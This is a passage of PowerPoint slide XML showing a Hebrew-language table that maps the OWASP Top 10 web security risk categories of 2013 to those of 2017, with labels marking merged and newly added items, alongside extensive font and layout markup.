                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="18000" marB="180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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A5:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – בקרת גישה שבורה </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[אוחד]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="360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rgbClr val="83276B">
                        <a:alpha val="20000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="335280">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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – חשיפת מידע רגיש</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="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a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="18000" marB="180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noFill/>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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – ניהול תצורה לא מאובטח</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="360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noFill/>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="335280">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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – חוסר בבקרת גישה ברמה היישומית </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[אוחד עם </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="4E8542"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="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rgbClr val="4E8541">
                        <a:alpha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a:solidFill>
                            <a:schemeClr val="bg1">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a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="18000" marB="180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noFill/>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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Scripting (XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="360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noFill/>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="335280">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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Request Forgery (CSRF)</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="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rgbClr val="D9EAD5"/>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kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="18000" marB="180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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A8:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – פתיחה לא מאובטחת של רצף סדרתי</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="r" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>                      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[חדש, התווסף ע"י הקהילה]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="83276B"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="360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rgbClr val="83276B">
                        <a:alpha val="20000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10008"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="335280">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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – שימוש ברכיבים עם פגיעויות ידועות</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="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a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="18000" marB="180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noFill/>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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – שימוש ברכיבים עם פגיעויות ידועות</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="360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xmlns="" val="10009"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="335280">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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – הפניות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> והעברות לא מאומתות</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="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rgbClr val="D9EAD5"/>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kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="18000" marB="180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noFill/>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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - תיעוד וניטור בלתי מספקים</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1050" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
